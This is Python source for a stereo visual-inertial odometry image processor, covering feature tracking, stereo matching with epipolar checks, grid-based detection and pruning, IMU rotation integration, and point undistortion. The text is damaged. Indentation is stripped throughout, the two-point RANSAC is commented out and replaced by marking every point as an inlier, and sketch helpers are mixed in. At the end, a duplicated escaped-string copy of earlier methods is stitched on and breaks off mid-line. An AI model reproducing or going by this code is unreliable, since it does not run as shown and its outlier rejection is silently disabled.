# Number of features left after tracking.
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
# Outlier removal involves three steps, which forms a close
# loop between the previous and current frames of cam0 (left)
# and cam1 (right). Assuming the stereo matching between the
# previous cam0 and cam1 images are correct, the three steps are:
#
# prev frames cam0 ----------> cam1
# | |
# |ransac |ransac
# | stereo match |
# curr frames cam0 ----------> cam1
#
# 1) Stereo matching between current images of cam0 and cam1.
# 2) RANSAC between previous and current images of cam0.
# 3) RANSAC between previous and current images of cam1.
#
# For Step 3, tracking between the images is no longer needed.
# The stereo matching results are directly used in the RANSAC.
# Step 1: stereo matching.
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points, match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points, match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points, match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
# Number of features left after stereo matching.
self.num_features['after_matching'] = len(curr_matched_cam0_points)
# Step 2 and 3: RANSAC on temporal image pairs of cam0 and cam1.
# cam0_ransac_inliers = self.two_point_ransac(
# prev_matched_cam0_points, curr_matched_cam0_points,
# cam0_R_p_c, self.cam0_intrinsics,
# self.cam0_distortion_model, self.cam0_distortion_coeffs,
# self.config.ransac_threshold, 0.99)
# cam1_ransac_inliers = self.two_point_ransac(
# prev_matched_cam1_points, curr_matched_cam1_points,
# cam1_R_p_c, self.cam1_intrinsics,
# self.cam1_distortion_model, self.cam1_distortion_coeffs,
# self.config.ransac_threshold, 0.99)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
# Number of features after ransac.
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
# Compute the tracking rate.
# prev_feature_num = sum([len(x) for x in self.prev_features])
# curr_feature_num = sum([len(x) for x in self.curr_features])
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
# Create a mask to avoid redetecting existing features.
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y-3:y+4, x-3:x+4] = 0
# Detect new features.
new_features = self.detector.detect(curr_img, mask=mask)
# Collect the new detected features based on the grid.
# Select the ones with top response within each grid afterwards.
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x:x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
# Find the stereo matched points for the newly detected features.
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
# if len(cam0_inliers) < max(5, len(new_features) * 0.1):
# Group the features into grids
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row*self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
        # Sort the new features in each grid by response, and collect the
        # highest-response features from each grid.
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x:x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
# Continue if the number of features in this grid does
# not exceed the upper bound.
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x:x.lifetime,
reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
# load features
filename = self.config.result_dir + str(self.image_id) + ".npz"
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
# save features
filename = self.config.result_dir + str(self.image_id) + ".npz"
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(
curr_cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(
curr_cam1_points, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(
self.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
# Find the start and the end limit within the imu msg buffer.
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
# Compute the mean angular velocity in the IMU frame.
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= (idx_end - idx_begin)
# Transform the mean angular velocity from the IMU frame to the
# cam0 and cam1 frames.
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
# Compute the relative rotation.
dt = self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.timestamp
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
# Delete the useless and used imu messages.
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
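    # Worked example: a constant gyro rate of 0.1 rad/s about the cam0
    # z-axis over dt = 0.05 s is an angle of 0.005 rad, so cam0_R_p_c equals
    # cv2.Rodrigues(np.array([0., 0., 0.005]))[0].T (transposed so that it
    # maps previous-frame vectors into the current frame).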
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
# def two_point_ransac(self, pts1, pts2, R_p_c, intrinsics,
# distortion_model, distortion_coeffs,
# inlier_error, success_probability):
# """
# Applies two point ransac algorithm to mark the inliers in the input set.
# Arguments:
# pts1: first set of points.
# pts2: second set of points.
# R_p_c: a rotation matrix takes a vector in the previous camera frame
# to the current camera frame.
# intrinsics: intrinsics of the camera.
# distortion_model: distortion model of the camera.
# distortion_coeffs: distortion coefficients.
# inlier_error: acceptable error to be considered as an inlier.
# success_probability: the required probability of success.
# Returns:
# inlier_flag: 1 for inliers and 0 for outliers.
# """
# # Check the size of input point size.
# assert len(pts1) == len(pts2), 'Sets of different size are used...'
# norm_pixel_unit = 2.0 / (intrinsics[0] + intrinsics[1])
# iter_num = int(np.ceil(np.log(1-success_probability) / np.log(1-0.7*0.7)))
# # Initially, mark all points as inliers.
# inlier_markers = [1] * len(pts1)
# # Undistort all the points.
# pts1_undistorted = self.undistort_points(pts1, intrinsics,
# distortion_model, distortion_coeffs)
# pts2_undistorted = self.undistort_points(pts2, intrinsics,
# distortion_model, distortion_coeffs)
        # Compensate the points in the previous image with
# # the relative rotation.
# for i, pt in enumerate(pts1_undistorted):
# pt_h = np.array([*pt, 1.0])
# pt_hc = R_p_c @ pt_h
# pts1_undistorted[i] = pt_hc[:2]
# # Normalize the points to gain numerical stability.
# pts1_undistorted, pts2_undistorted, scaling_factor = self.rescale_points(
# pts1_undistorted, pts2_undistorted)
# # Compute the difference between previous and current points,
# # which will be used frequently later.
# pts_diff = []
# for pt1, pt2 in zip(pts1_undistorted, pts2_undistorted):
# pts_diff.append(pt1 - pt2)
# # Mark the point pairs with large difference directly.
# # BTW, the mean distance of the rest of the point pairs are computed.
# mean_pt_distance = 0.0
# raw_inlier_count = 0
# for i, pt_diff in enumerate(pts_diff):
# distance = np.linalg.norm(pt_diff)
        # 50 pixel distance is a pretty large tolerance for normal motion.
# # However, to be used with aggressive motion, this tolerance should
# # be increased significantly to match the usage.
# if distance > 50.0 * norm_pixel_unit:
# inlier_markers[i] = 0
# else:
# mean_pt_distance += distance
# raw_inlier_count += 1
# mean_pt_distance /= raw_inlier_count
# # If the current number of inliers is less than 3, just mark
# # all input as outliers. This case can happen with fast
# # rotation where very few features are tracked.
# if raw_inlier_count < 3:
# return [0] * len(inlier_markers)
# # Before doing 2-point RANSAC, we have to check if the motion
        # is degenerate, meaning that there is no translation between
# # the frames, in which case, the model of the RANSAC does not work.
# # If so, the distance between the matched points will be almost 0.
# if mean_pt_distance < norm_pixel_unit:
# for i, pt_diff in enumerate(pts_diff):
# if inlier_markers[i] == 0:
# continue
# if np.linalg.norm(pt_diff) > inlier_error * norm_pixel_unit:
# inlier_markers[i] = 0
# return inlier_markers
# # In the case of general motion, the RANSAC model can be applied.
        # The three columns correspond to tx, ty, and tz respectively.
# coeff_t = []
# for i, pt_diff in enumerate(pts_diff):
# coeff_t.append(np.array([
# pt_diff[1],
# -pt_diff[0],
        #     pts1_undistorted[i][0] * pts2_undistorted[i][1] -
        #     pts1_undistorted[i][1] * pts2_undistorted[i][0]]))
# coeff_t = np.array(coeff_t)
# raw_inlier_idx = np.where(inlier_markers)[0]
# best_inlier_set = []
# best_error = 1e10
# for i in range(iter_num):
# # Randomly select two point pairs.
        # Although this is a weird way of selecting two pairs, it
# # is able to efficiently avoid selecting repetitive pairs.
# pair_idx1 = np.random.choice(raw_inlier_idx)
# idx_diff = np.random.randint(1, len(raw_inlier_idx))
# pair_idx2 = (pair_idx1+idx_diff) % len(raw_inlier_idx)
# # Construct the model.
# coeff_t_ = np.array([coeff_t[pair_idx1], coeff_t[pair_idx2]])
# coeff_tx = coeff_t_[:, 0]
# coeff_ty = coeff_t_[:, 1]
# coeff_tz = coeff_t_[:, 2]
# coeff_l1_norm = np.linalg.norm(coeff_t_, 1, axis=0)
# base_indicator = np.argmin(coeff_l1_norm)
# if base_indicator == 0:
# A = np.array([coeff_ty, coeff_tz]).T
# solution = np.linalg.inv(A) @ (-coeff_tx)
# model = [1.0, *solution]
# elif base_indicator == 1:
# A = np.array([coeff_tx, coeff_tz]).T
# solution = np.linalg.inv(A) @ (-coeff_ty)
# model = [solution[0], 1.0, solution[1]]
# else:
# A = np.array([coeff_tx, coeff_ty]).T
# solution = np.linalg.inv(A) @ (-coeff_tz)
# model = [*solution, 1.0]
# # Find all the inliers among point pairs.
# error = coeff_t @ model
# inlier_set = []
# for i, e in enumerate(error):
# if inlier_markers[i] == 0:
# continue
# if np.abs(e) < inlier_error * norm_pixel_unit:
# inlier_set.append(i)
# # If the number of inliers is small, the current model is
# # probably wrong.
# if len(inlier_set) < 0.2 * len(pts1_undistorted):
# continue
# # Refit the model using all of the possible inliers.
# coeff_t_ = coeff_t[inlier_set]
# coeff_tx_better = coeff_t_[:, 0]
# coeff_ty_better = coeff_t_[:, 1]
# coeff_tz_better = coeff_t_[:, 2]
# if base_indicator == 0:
# A = np.array([coeff_ty_better, coeff_tz_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tx_better)
# model_better = [1.0, *solution]
# elif base_indicator == 1:
# A = np.array([coeff_tx_better, coeff_tz_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_ty_better)
# model_better = [solution[0], 1.0, solution[1]]
# else:
# A = np.array([coeff_tx_better, coeff_ty_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tz_better)
# model_better = [*solution, 1.0]
        # Compute the error and update the best model if possible.
# new_error = coeff_t @ model_better
# this_error = np.mean([np.abs(new_error[i]) for i in inlier_set])
        # if len(inlier_set) > len(best_inlier_set):
# best_error = this_error
# best_inlier_set = inlier_set
# # Fill in the markers.
# inlier_markers = [0] * len(pts1)
# for i in best_inlier_set:
# inlier_markers[i] = 1
# return inlier_markers
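    # A compact, hedged sketch of the 2-point RANSAC documented above (not
    # the original implementation -- the pipeline currently bypasses it and
    # marks everything inlier). With the rotation R_p_c known from the gyro,
    # a correspondence satisfies p2^T [t]_x (R_p_c p1) = 0, which is linear
    # in the translation t, so two correspondences define one hypothesis.
    # The method name and the default thresholds below are assumptions.
    def two_point_ransac_sketch(self, pts1, pts2, R_p_c, intrinsics,
            distortion_model, distortion_coeffs,
            inlier_error=3.0, iterations=100):
        """Hedged sketch: returns a list with 1 for inliers, 0 for outliers."""
        assert len(pts1) == len(pts2), 'Sets of different size are used...'
        if len(pts1) < 2:
            return [0] * len(pts1)
        norm_pixel_unit = 2.0 / (intrinsics[0] + intrinsics[1])
        p1 = self.undistort_points(pts1, intrinsics,
            distortion_model, distortion_coeffs)
        p2 = np.asarray(self.undistort_points(pts2, intrinsics,
            distortion_model, distortion_coeffs))
        # Rotation-compensate the points of the previous frame.
        p1 = np.array([(R_p_c @ np.array([*pt, 1.0]))[:2] for pt in p1])
        # Each row multiplies the unknown translation t = (tx, ty, tz).
        d = p1 - p2
        coeff_t = np.stack([d[:, 1], -d[:, 0],
            p1[:, 0] * p2[:, 1] - p1[:, 1] * p2[:, 0]], axis=1)
        best_inliers = np.zeros(len(p1), dtype=bool)
        for _ in range(iterations):
            i, j = np.random.choice(len(p1), 2, replace=False)
            # Null vector of the 2x3 system gives t up to scale.
            _, _, vt = np.linalg.svd(coeff_t[[i, j]])
            t = vt[-1]
            err = np.abs(coeff_t @ t) / (np.linalg.norm(t) + 1e-12)
            inliers = err < inlier_error * norm_pixel_unit
            if inliers.sum() > best_inliers.sum():
                best_inliers = inliers
        return best_inliers.astype(int).tolist()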
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
        Compensates for the rotation between consecutive camera frames so
        that feature tracking is more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
            intrinsics: intrinsics of the camera. (vec4: fx, fy, cx, cy)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
# Return directly if there are no input features.
if len(input_pts) == 0:
return []
# Intrinsic matrix.
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
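    # Worked example for the compensation above: H = K @ R_p_c @ K^{-1} is
    # the infinite homography; with zero rotation it must be the identity.
    # The numbers below are hypothetical, purely for a self-check.
    @staticmethod
    def _predict_tracking_self_check():
        K = np.array([
            [400.0, 0.0, 320.0],
            [0.0, 400.0, 240.0],
            [0.0, 0.0, 1.0]])
        H = K @ np.identity(3) @ np.linalg.inv(K)
        p = np.array([100.0, 120.0, 1.0])
        q = H @ p
        assert np.allclose(q[:2] / q[2], p[:2])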
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
            return np.array([]), np.array([])
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(
cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(
cam0_points_undistorted, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
# Track features using LK optical flow method.
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(
self.curr_cam0_pyramid, self.curr_cam1_pyramid,
cam0_points, cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(
self.curr_cam1_pyramid, self.curr_cam0_pyramid,
cam1_points, cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
# cam1_points_undistorted = self.undistort_points(
# cam1_points, self.cam1_intrinsics,
# self.cam1_distortion_model, self.cam1_distortion_coeffs, R_cam0_cam1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce(
[inlier_markers.reshape(-1), err < 3, disparity < 20])
# Mark those tracked points out of the image region as untracked.
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if (point[0] < 0 or point[0] > img.shape[1]-1 or
point[1] < 0 or point[1] > img.shape[0]-1):
inlier_markers[i] = 0
        # Compute the relative translation between the cam0 and cam1 frames.
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
# Compute the essential matrix.
E = skew(t_cam0_cam1) @ R_cam0_cam1
# Further remove outliers based on the known essential matrix.
cam0_points_undistorted = self.undistort_points(
cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(
cam1_points, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (
self.cam0_intrinsics[0] + self.cam0_intrinsics[1] +
self.cam1_intrinsics[0] + self.cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
            # Point-to-epipolar-line distance: |pt1 . l| / ||(l0, l1)||.
            error = np.abs(pt1 @ epipolar_line) / np.linalg.norm(
                epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
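    # Hedged helper mirroring the epipolar gate above: the distance from a
    # normalized point pt1 to its epipolar line l = E @ pt0. The name is an
    # assumption; the pipeline computes this inline in stereo_match.
    @staticmethod
    def _epipolar_distance(pt0, pt1, E):
        line = E @ pt0
        return np.abs(pt1 @ line) / np.linalg.norm(line[:2])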
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
K_new = np.array([
[new_intrinsics[0], 0.0, new_intrinsics[2]],
[0.0, new_intrinsics[1], new_intrinsics[3]],
[0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K, distortion_coeffs,
rectification_matrix, K_new)
else: # default: 'radtan'
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs, None,
rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else: # default: 'radtan'
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts,
np.zeros(3), np.zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
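    # Hedged round-trip check (helper name is an assumption): undistorting
    # to normalized coordinates and distorting back with the same model
    # should approximately recover the input pixels.
    def _distortion_round_trip(self, pts, intrinsics, distortion_model,
            distortion_coeffs):
        und = self.undistort_points(pts, intrinsics,
            distortion_model, distortion_coeffs)
        back = self.distort_points(und, intrinsics,
            distortion_model, distortion_coeffs)
        return float(np.max(np.linalg.norm(np.asarray(pts) - back, axis=1)))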
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
def skew(vec):
x, y, z = vec
return np.array([
[0, -z, y],
[z, 0, -x],
[-y, x, 0]])
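# Quick hedged check for skew: skew(a) @ b equals the cross product a x b.
def _check_skew(a=np.array([1.0, 2.0, 3.0]), b=np.array([4.0, 5.0, 6.0])):
    return np.allclose(skew(a) @ b, np.cross(a, b))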
def select(data, selectors):
return [d for d, s in zip(data, selectors) if s]
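# Minimal usage sketch (hypothetical driver; `config` and the message
# objects come from the surrounding project and are assumed to provide the
# attributes accessed above, e.g. msg.timestamp and stereo_msg.cam0_msg):
def run_image_processor(config, imu_msgs, stereo_msgs):
    processor = ImageProcessor(config)
    feature_msgs = []
    for imu_msg in imu_msgs:
        processor.imu_callback(imu_msg)
    for stereo_msg in stereo_msgs:
        msg = processor.stereo_callback(stereo_msg)
        if msg is not None:
            feature_msgs.append(msg)
    return feature_msgs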
+ str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the 
rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, 